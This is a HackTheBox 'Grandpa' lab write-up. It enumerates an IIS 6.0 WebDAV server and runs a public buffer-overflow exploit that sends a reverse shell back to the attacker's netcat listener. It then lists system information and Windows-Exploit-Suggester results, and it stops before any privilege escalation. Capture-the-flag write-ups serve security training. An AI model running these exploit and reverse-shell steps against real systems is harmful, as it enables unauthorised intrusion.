HackTheBox Grandpa Writeup
Nmap Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Nmap 7.95 scan initiated Mon May 26 17:34:37 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up, received echo-reply ttl 127 (0.054s latency).
Scanned at 2025-05-26 17:34:37 GMT for 12s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 6.0
|_http-title: Under Construction
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK, DELETE, PUT, POST, MOVE, MKCOL, PROPPATCH
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 26 17:34:49 2025 -- 1 IP address (1 host up) scanned in 12.05 seconds
Exploit
WebDAV exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(wzwr㉿kali)-[~/htb/grandpa]
└─$ searchsploit "Microsoft IIS 6.0"
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | windows/remote/19033.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We can use windows/remote/41738.py to exploit.
1
2
┌──(wzwr㉿kali)-[~/htb/grandpa]
└─$ python2 41738.py 10.10.10.14 80 10.10.14.8 58787
1
2
3
4
5
6
7
8
9
10
┌──(wzwr㉿kali)-[~/htb/grandpa]
└─$ nc -lnvp 58787
listening on [any] 58787 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.14] 1030
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
Privileges Escalation
System Information
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: GRANPA
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-640-1780573-45389
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 0 Hours, 26 Minutes, 33 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 11/12/2020
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 752 MB
Virtual Memory: Max Size: 2,048 MB
Virtual Memory: Available: 1,989 MB
Virtual Memory: In Use: 59 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.14
We can use Windows-Exploit-Suggester to suggest exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
┌──(wzwr㉿kali)-[~/htb/grandpa]
└─$ python2 ../windows-exploit-suggester.py --database 2014-06-06-mssb.xls --systeminfo systeminfo.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(s) installed on the system with the 351 hotfix(s) in the database
[*] v.1.0 - (c) 2014 Aon Cyber Labs
[E] MS14-040: Vulnerability in AFD.sys Could Allow Elevation of Privilege (2982378) - Critical
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[E] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3010788) - Critical
[E] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[E] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[E] MS14-056: Vulnerability in Windows Audio Service Could Allow Elevation of Privilege (2987150) - Important
[E] MS14-048: Vulnerability in Microsoft Search Component Could Allow Remote Code Execution (2973112) - Critical
[E] MS14-044: Vulnerabilities in SQL Server Could Allow Elevation of Privilege (2984340) - Important
[E] MS14-041: Vulnerability in DirectShow Could Allow Elevation of Privilege (2975609) - Important
[E] MS14-037: Vulnerability in Internet Explorer Could Allow Remote Code Execution (2975689) - Critical
[E] MS14-036: Vulnerabilities in Graphics Component Could Allow Remote Code Execution (2967487) - Critical
[E] MS14-033: Vulnerability in Microsoft XML Core Services Could Allow Information Disclosure (2966061) - Important
[E] MS14-030: Vulnerability in Remote Desktop Protocols Could Allow Tampering (2969259) - Important
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[E] MS14-022: Vulnerabilities in Microsoft SharePoint Server Could Allow Remote Code Execution (2952166) - Critical
[E] MS14-019: Vulnerability in Windows File Handling Component Could Allow Remote Code Execution (2964358) - Important
[E] MS14-018: Vulnerability in Internet Explorer Could Allow Remote Code Execution (2950467) - Critical
[E] MS14-016: Vulnerability in Windows File Handling Component Could Allow Remote Code Execution (2954853) - Important
[E] MS14-015: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2953021) - Important
[E] MS14-014: Vulnerabilities in Silverlight Could Allow Bypass of Security Feature (2952664) - Important
[E] MS14-013: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2950145) - Critical
[E] MS14-012: Vulnerabilities in Internet Explorer Could Allow Remote Code Execution (2925418) - Critical
[E] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-005: Vulnerability in Microsoft XML Core Services Could Allow Information Disclosure (2916036) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-102: Vulnerability in LRPC Client Could Allow Elevation of Privilege (2898715) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[E] MS13-099: Vulnerability in Microsoft Scripting Runtime Object Library Could Allow Remote Code Execution (2892074) - Critical
[E] MS13-097: Vulnerabilities in Internet Explorer Could Allow Remote Code Execution (2898785) - Critical
[E] MS13-094: Vulnerability in Microsoft Outlook Could Allow Information Disclosure (2894514) - Important
[E] MS13-093: Vulnerability in Windows Auxillary Function Driver Could Allow Elevation of Privilege (2876315) - Important
[E] MS13-092: Vulnerability in Hyper-V Could Allow Elevation of Privilege (2893984) - Important
[E] MS13-090: Vulnerability in ActiveX Control Could Allow Remote Code Execution (2900986) - Critical
[E] MS13-089: Vulnerability in Windows Graphics Device Interface Could Allow Remote Code Execution (2876331) - Critical
[E] MS13-088: Vulnerabilities in Internet Explorer Could Allow Remote Code Execution (2888505) - Critical
[E] MS13-087: Vulnerability in Silverlight Could Allow Information Disclosure (2890788) - Important
[E] MS13-083: Vulnerability in ASP.NET SignalR Could Allow Elevation of Privilege (2866061) - Important
[E] MS13-081: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2870008) - Critical
[E] MS13-080: Vulnerabilities in Internet Explorer Could Allow Remote Code Execution (2879017) - Critical
[E] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[E] MS13-068: Vulnerability in Microsoft Outlook Could Allow Remote Code Execution (2756145) - Critical
[E] MS13-065: Vulnerability in ICMPv6 could allow Denial of Service (2868623) - Important
[E] MS13-063: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2859537) - Important
[E] MS13-060: Vulnerability in Unicode Scripts Processor Could Allow Remote Code Execution (2850949) - Critical
[E] MS13-059: Vulnerability in Internet Explorer Could Allow Remote Code Execution (2862772) - Critical
[E] MS13-055: Vulnerability in Internet Explorer Could Allow Remote Code Execution (2846071) - Critical
[E] MS13-054: Vulnerability in GDI+ Could Allow Remote Code Execution (2834886) - Critical
[E] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[E] MS13-052: Vulnerability in .NET Framework Could Allow Remote Code Execution (2861697) - Critical
[E] MS13-049: Vulnerability in Kernel-Mode Driver Could Allow Denial of Service (2845690) - Important
[E] MS13-048: Vulnerability in Windows Kernel Could Allow Information Disclosure (2839229) - Important
[E] MS13-047: Vulnerability in Internet Explorer Could Allow Remote Code Execution (2838727) - Critical
[E] MS13-046: Vulnerabilities in Kernel-Mode Drivers Could Allow Elevation of Privilege (2840221) - Important
[E] MS13-039: Vulnerability in HTTP.sys Could Allow Denial of Service (2829254) - Important
[E] MS13-038: Vulnerability in Internet Explorer Could Allow Remote Code Execution (2847204) - Critical
[E] MS13-037: Vulnerability in Internet Explorer Could Allow Remote Code Execution (2829530) - Critical
[E] MS13-036: Vulnerabilities in Kernel-Mode Driver Could Allow Elevation of Privilege (2829996) - Important
[E] MS13-031: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2813170) - Important
[E] MS13-029: Vulnerability in Remote Desktop Client Could Allow Remote Code Execution (2828223) - Critical
[E] MS13-028: Vulnerability in Internet Explorer Could Allow Remote Code Execution (2817183) - Critical
[E] MS13-022: Vulnerability in Silverlight Could Allow Remote Code Execution (2814124) - Critical
[E] MS13-018: Vulnerability in TCP/IP Could Allow Denial of Service (2790655) - Important
[E] MS13-017: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2799494) - Important
[E] MS13-016: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2807986) - Important
[E] MS13-010: Vulnerability in Vector Markup Language Could Allow Remote Code Execution (2797052) - Critical
[E] MS13-009: Vulnerabilities in Internet Explorer Could Allow Remote Code Execution (2792100) - Critical
[E] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-083: Vulnerability in IP-HTTPS Component Could Allow Security Feature Bypass (2765809) - Important
[E] MS12-077: Vulnerabilities in Internet Explorer Could Allow Remote Code Execution (2761451) - Critical
[E] MS12-073: Vulnerabilities in Microsoft IIS Could Allow Information Disclosure (2733829) - Important
[E] MS12-072: Vulnerabilities in Windows Shell Could Allow Remote Code Execution (2727528) - Critical
[E] MS12-071: Vulnerability in Internet Explorer Could Allow Remote Code Execution (2761465) - Critical
[E] MS12-070: Vulnerability in SQL Server Could Allow Elevation of Privilege (2754849) - Important
[E] MS12-069: Vulnerabilities in Kerberos Could Allow Denial of Service (2743555) - Important
[E] MS12-068: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2756254) - Important
[E] MS12-067: Vulnerabilities in FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution (2742319) - Important
[E] MS12-065: Vulnerability in Microsoft Works Could Allow Remote Code Execution (2754670) - Important
[E] MS12-064: Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (2742319) - Critical
[E] MS12-063: Vulnerability in Internet Explorer Could Allow Remote Code Execution (2755244) - Critical
[E] MS12-060: Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2720573) - Critical
[E] MS12-058: Vulnerabilities in Microsoft Exchange Server WebReady Document Viewing Could Allow Remote Code Execution (2740358) - Critical
[E] MS12-056: Vulnerability in JScript and VBScript Engines Could Allow Remote Code Execution (2706045) - Critical
[E] MS12-054: Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution (2705244) - Critical
[E] MS12-053: Vulnerability in Remote Desktop could allow Remote Code Execution (2723135) - Critical
[E] MS12-052: Vulnerability in Internet Explorer Could Allow Remote Code Execution (2722913) - Critical
[E] MS12-050: Vulnerabilities in Microsoft SharePoint Could Allow Elevation of Privilege (2695502) - Important
[E] MS12-049: Vulnerability in TLS Could Allow Information Disclosure (2655992) - Important
[E] MS12-047: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2718523) - Important
[E] MS12-046: Vulnerability in Visual Basic for Applications Could Allow Remote Code Execution (2707924) - Important
[E] MS12-045: Vulnerability in Microsoft Data Access Components Could Allow Remote Code Execution (2698365) - Critical
[E] MS12-044: Vulnerabilities in Internet Explorer Could Allow Remote Code Execution (2719177) - Critical
[E] MS12-043: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (2721691) - Critical
[E] MS12-042: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2711164) - Important
[E] MS12-041: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2709162) - Important
[E] MS12-039: Vulnerabilities in Lync Could Allow Remote Code Execution (2707956) - Important
[E] MS12-038: Vulnerability in .NET Framework Could Allow Remote Code Execution (2706726) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[E] MS12-036: Vulnerability in Remote Desktop Could Allow Remote Code Execution (2685939) - Critical
[E] MS12-035: Vulnerabilities in .NET Framework Could Allow Remote Code Execution (2693777) - Critical
[E] MS12-034: Vulnerabilities in Keyboard Layout Conversion Could Allow Elevation of Privilege (2686509) - Important
[E] MS12-033: Vulnerability in Windows Partition Manager Could Allow Elevation of Privilege (2690533) - Important
[E] MS12-032: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2688338) - Important
[E] MS12-031: Vulnerability in Microsoft Visio Viewer 2010 Could Allow Remote Code Execution (2597986) - Important
[E] MS12-029: Vulnerability in Microsoft Word Could Allow Remote Code Execution (2663830) - Critical
[E] MS12-028: Vulnerability in Microsoft Office Could Allow Remote Code Execution (2639185) - Important
[E] MS12-027: Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2664258) - Critical
[E] MS12-025: Vulnerability in .NET Framework Could Allow Remote Code Execution (2671605) - Critical
[E] MS12-024: Vulnerability in Windows Authenticode Signature Verification Could Allow Remote Code Execution (2655992) - Critical
[E] MS12-023: Cumulative Security Update for Internet Explorer (2675157) - Critical
[E] MS12-022: Vulnerability in Expression Design Could Allow Remote Code Execution (2651012) - Important
[E] MS12-021: Vulnerability in Visual Studio Could Allow Elevation of Privilege (2654360) - Important
[E] MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) - Critical
[E] MS12-018: Vulnerability in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2641653) - Important
[E] MS12-017: Vulnerability in DNS Server Could Allow Denial of Service (2647170) - Important
[E] MS12-016: Vulnerabilities in .NET Framework and Silverlight Could Allow Remote Code Execution (2651026) - Critical
[E] MS12-015: Vulnerabilities in Microsoft Visio Viewer 2010 Could Allow Remote Code Execution (2663510) - Important
[E] MS12-014: Vulnerability in Indeo Codec Could Allow Remote Code Execution (2661637) - Important
[E] MS12-012: Vulnerability in Color Control Panel Could Allow Remote Code Execution (2643719) - Critical
[E] MS12-011: Vulnerabilities in Microsoft SharePoint Could Allow Elevation of Privilege (2663841) - Important
[E] MS12-010: Cumulative Security Update for Internet Explorer (2647516) - Critical
[E] MS12-009: Vulnerabilities in Ancillary Function Driver Could Allow Elevation of Privilege (2647169) - Important
[E] MS12-006: Vulnerability in SSL/TLS Could Allow Information Disclosure (2643584) - Important
[E] MS12-005: Vulnerability in Microsoft Windows Could Allow Remote Code Execution (2588516) - Critical
[E] MS12-004: Vulnerabilities in Windows Media Player Could Allow Remote Code Execution (2636391) - Critical
[E] MS12-002: Vulnerability in Windows Object Packager Could Allow Remote Code Execution (2603308) - Critical
[E] MS12-001: Vulnerability in Windows Kernel Could Allow Security Feature Bypass (2644615) - Important
[E] MS11-100: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2638080) - Critical
[E] MS11-098: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2633171) - Important
[E] MS11-097: Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2620712) - Important
[E] MS11-092: Vulnerability in Windows Media Player Could Allow Remote Code Execution (2619339) - Critical
[E] MS11-090: Cumulative Security Update for ActiveX Killbits (2618451) - Critical
[E] MS11-088: Vulnerability in Microsoft Office IME (Chinese) Could Allow Elevation of Privilege (2652016) - Important
[E] MS11-087: Vulnerability in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2639417) - Critical
[E] MS11-086: Vulnerability in Active Directory Could Allow Elevation of Privilege (2617657) - Important
[E] MS11-081: Cumulative Security Update for Internet Explorer (2586448) - Critical
[E] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-078: Vulnerability in .NET Framework and Microsoft Silverlight Could Allow Remote Code Execution (2604930) - Critical
[E] MS11-077: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2619234) - Critical
[E] MS11-073: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2587634) - Important
[E] MS11-071: Vulnerability in Windows Components Could Allow Remote Code Execution (2598379) - Important
[E] MS11-070: Vulnerability in WINS Could Allow Elevation of Privilege (2571621) - Important
[E] MS11-068: Vulnerability in Windows Kernel Could Allow Denial of Service (2578074) - Important
[E] MS11-067: Vulnerability in Microsoft Report Viewer Could Allow Information Disclosure (2578927) - Important
[E] MS11-066: Vulnerability in Microsoft Chart Control Could Allow Information Disclosure (2580149) - Important
[E] MS11-065: Vulnerabilities in Remote Desktop Protocol Could Allow Denial of Service (2570051) - Critical
[E] MS11-064: Vulnerabilities in TCP/IP Stack Could Allow Denial of Service (2563894) - Critical
[E] MS11-063: Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2567680) - Important
[E] MS11-062: Vulnerability in Remote Access Service NDISTAPI Driver Could Allow Elevation of Privilege (2566454) - Important
[E] MS11-061: Vulnerabilities in Microsoft Exchange Server Could Allow Elevation of Privilege (2579686) - Important
[E] MS11-058: Vulnerabilities in DNS Server Could Allow Remote Code Execution (2562485) - Critical
[E] MS11-057: Cumulative Security Update for Internet Explorer (2559049) - Critical
[E] MS11-056: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2507938) - Important
[E] MS11-054: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2555917) - Important
[E] MS11-053: Vulnerability in Bluetooth Stack Could Allow Remote Code Execution (2561158) - Critical
[E] MS11-052: Vulnerability in Vector Markup Language Could Allow Remote Code Execution (2544521) - Critical
[E] MS11-050: Cumulative Security Update for Internet Explorer (2530548) - Critical
[E] MS11-049: Vulnerability in Microsoft XML Editor Could Allow Information Disclosure (2543893) - Important
[E] MS11-048: Vulnerability in SMB Server Could Allow Denial of Service (2536275) - Important
[E] MS11-046: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2503665) - Important
[E] MS11-045: Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2537146) - Important
[E] MS11-044: Vulnerability in .NET Framework Could Allow Remote Code Execution (2538814) - Critical
[E] MS11-041: Vulnerability in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2525694) - Critical
[E] MS11-040: Vulnerability in Threat Management Gateway Firewall Client Could Allow Remote Code Execution (2520426) - Critical
[E] MS11-039: Vulnerability in .NET Framework and Microsoft Silverlight Could Allow Remote Code Execution (2514842) - Critical
[E] MS11-038: Vulnerability in OLE Automation Could Allow Remote Code Execution (2476490) - Critical
[E] MS11-037: Vulnerability in MHTML Could Allow Information Disclosure (2544521) - Important
[E] MS11-034: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2506223) - Important
[E] MS11-033: Vulnerability in WordPad Text Converters Could Allow Remote Code Execution (2485663) - Important
[E] MS11-032: Vulnerability in OpenType Compact Font Format (CFF) Driver Could Allow Remote Code Execution (2507618) - Critical
[E] MS11-031: Vulnerability in JScript and VBScript Scripting Engines Could Allow Remote Code Execution (2512827) - Critical
[E] MS11-030: Vulnerability in DNS Resolution Could Allow Remote Code Execution (2509553) - Critical
[E] MS11-028: Vulnerability in .NET Framework Could Allow Remote Code Execution (2446708) - Critical
[E] MS11-026: Vulnerability in MHTML Could Allow Information Disclosure (2503658) - Important
[E] MS11-020: Vulnerability in SMB Server Could Allow Remote Code Execution (2508429) - Critical
[E] MS11-019: Vulnerabilities in SMB Client Could Allow Remote Code Execution (2511455) - Critical
[E] MS11-018: Cumulative Security Update for Internet Explorer (2497640) - Critical
[E] MS11-014: Vulnerability in Local Security Authority Subsystem Service Could Allow Local Elevation of Privilege (2478953) - Important
[E] MS11-013: Vulnerabilities in Kerberos Could Allow Elevation of Privilege (2496930) - Important
[E] MS11-012: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2479628) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[E] MS11-009: Vulnerability in JScript and VBScript Scripting Engines Could Allow Information Disclosure (2475792) - Critical
[E] MS11-008: Vulnerabilities in Microsoft Visio Could Allow Remote Code Execution (2475798) - Important
[E] MS11-007: Vulnerability in OpenType Compact Font Format (CFF) Driver Could Allow Remote Code Execution (2483185) - Critical
[E] MS11-006: Vulnerability in Windows Shell Graphics Processing Could Allow Remote Code Execution (2483185) - Critical
[E] MS11-003: Cumulative Security Update for Internet Explorer (2482017) - Critical
[E] MS10-101: Vulnerability in Windows Netlogon Service Could Allow Denial of Service (2443105) - Important
[E] MS10-099: Vulnerability in Routing and Remote Access Could Allow Elevation of Privilege (2440591) - Important
[E] MS10-098: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2436673) - Important
[E] MS10-096: Vulnerability in Windows Address Book Could Allow Remote Code Execution (2422556) - Critical
[E] MS10-092: Vulnerability in Task Scheduler Could Allow Elevation of Privilege (2305420) - Important
[E] MS10-091: Vulnerabilities in OpenType Font Driver Could Allow Remote Code Execution (2296199) - Critical
[E] MS10-090: Cumulative Security Update for Internet Explorer (2416400) - Critical
[E] MS10-087: Vulnerability in Microsoft Office Could Allow Remote Code Execution (2423930) - Critical
[E] MS10-082: Vulnerability in Windows Media Player Could Allow Remote Code Execution (2378111) - Critical
[E] MS10-081: Vulnerability in Windows Common Control Library Could Allow Remote Code Execution (2296011) - Critical
[E] MS10-079: Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (2296010) - Critical
[E] MS10-078: Vulnerabilities in OpenType Font Driver Could Allow Elevation of Privilege (2279306) - Critical
[E] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[E] MS10-071: Cumulative Security Update for Internet Explorer (2360131) - Critical
[E] MS10-069: Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2121546) - Important
[E] MS10-067: Vulnerability in WordPad Text Converters Could Allow Remote Code Execution (2259922) - Critical
[E] MS10-066: Vulnerability in Remote Procedure Call Could Allow Remote Code Execution (982802) - Critical
[E] MS10-065: Vulnerabilities in Microsoft IIS Could Allow Remote Code Execution (2267960) - Critical
[E] MS10-064: Vulnerability in Microsoft Outlook Could Allow Remote Code Execution (2254159) - Critical
[E] MS10-063: Vulnerability in Unicode Scripts Processor Could Allow Remote Code Execution (2255544) - Critical
[E] MS10-062: Vulnerability in MPEG-4 Codec Could Allow Remote Code Execution (975558) - Critical
[E] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-060: Vulnerabilities in the Microsoft .NET Framework and Microsoft Silverlight Could Allow Remote Code Execution (2265906) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-058: Vulnerabilities in TCP/IP Could Allow Elevation of Privilege (978886) - Critical
[E] MS10-057: Vulnerability in Microsoft Excel Could Allow Remote Code Execution (2204046) - Important
[E] MS10-054: Vulnerabilities in SMB Server Could Allow Remote Code Execution (982214) - Critical
[E] MS10-053: Cumulative Security Update for Internet Explorer (2183461) - Critical
[E] MS10-052: Vulnerability in Microsoft MPEG Layer-3 Codecs Could Allow Remote Code Execution (2115168) - Critical
[E] MS10-051: Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (2079403) - Critical
[E] MS10-050: Vulnerability in Windows Movie Maker Could Allow Remote Code Execution (981997) - Critical
[E] MS10-049: Vulnerabilities in SChannel Could Allow Remote Code Execution (980436) - Critical
[E] MS10-048: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2032276) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[E] MS10-046: Vulnerability in Windows Mail Active X Control Could Allow Remote Code Execution (980195) - Critical
[E] MS10-045: Vulnerability in Microsoft Office Outlook Could Allow Remote Code Execution (978212) - Critical
[E] MS10-043: Vulnerability in Canonical Display Driver Could Allow Remote Code Execution (2032276) - Critical
[E] MS10-042: Vulnerability in Help and Support Center Could Allow Remote Code Execution (2106203) - Critical
[E] MS10-039: Vulnerabilities in Microsoft SharePoint Could Allow Elevation of Privilege (983444) - Critical
[E] MS10-038: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2027452) - Critical
[E] MS10-034: Vulnerabilities in ActiveX Controls Could Allow Remote Code Execution (980195) - Critical
[E] MS10-033: Vulnerabilities in Media Decompression Could Allow Remote Code Execution (979902) - Critical
[E] MS10-032: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (978562) - Important
[E] MS10-030: Vulnerability in Microsoft Outlook Express and Windows Mail Could Allow Remote Code Execution (978542) - Critical
